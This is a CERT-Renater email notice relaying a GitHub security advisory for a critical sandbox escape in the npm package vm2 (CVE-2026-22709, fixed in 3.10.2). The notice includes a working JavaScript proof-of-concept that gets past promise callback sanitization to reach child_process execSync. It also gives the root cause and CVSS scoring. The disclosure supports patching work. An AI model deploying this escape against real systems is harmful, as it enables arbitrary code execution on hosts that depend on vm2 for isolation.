Ce mail provient de l'extérieur, restons vigilants ===================================================================== CERT-Renater Note d'Information No. 2026/VULN083 _____________________________________________________________________ DATE : 28/01/2026 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running vm2 versions prior to 3.10.2. ===================================================================== https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8 _____________________________________________________________________ Sandbox Escape Critical patriksimek published GHSA-99p7-6v5w-7xg8 Jan 25, 2026 Package vm2 (npm) Affected versions <= 3.10.0 Patched versions 3.10.2 Description In vm2 for version 3.10.0, Promise.prototype.then Promise.prototype.catch callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. const { VM } = require("vm2"); const code = ` const error = new Error(); error.name = Symbol(); const f = async () => error.stack; const promise = f(); promise.catch(e => { const Error = e.constructor; const Function = Error.constructor; const f = new Function( "process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })" ); f(); }); `; new VM().run(code); In lib/setup-sandbox.js, the callback function of localPromise.prototype.then is sanitized, but globalPromise.prototype.then is not sanitized. The return value of async functions is globalPromise object. Severity Critical 9.8/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required None User interaction None Scope Unchanged Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE ID CVE-2026-22709 Weaknesses No CWEs ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================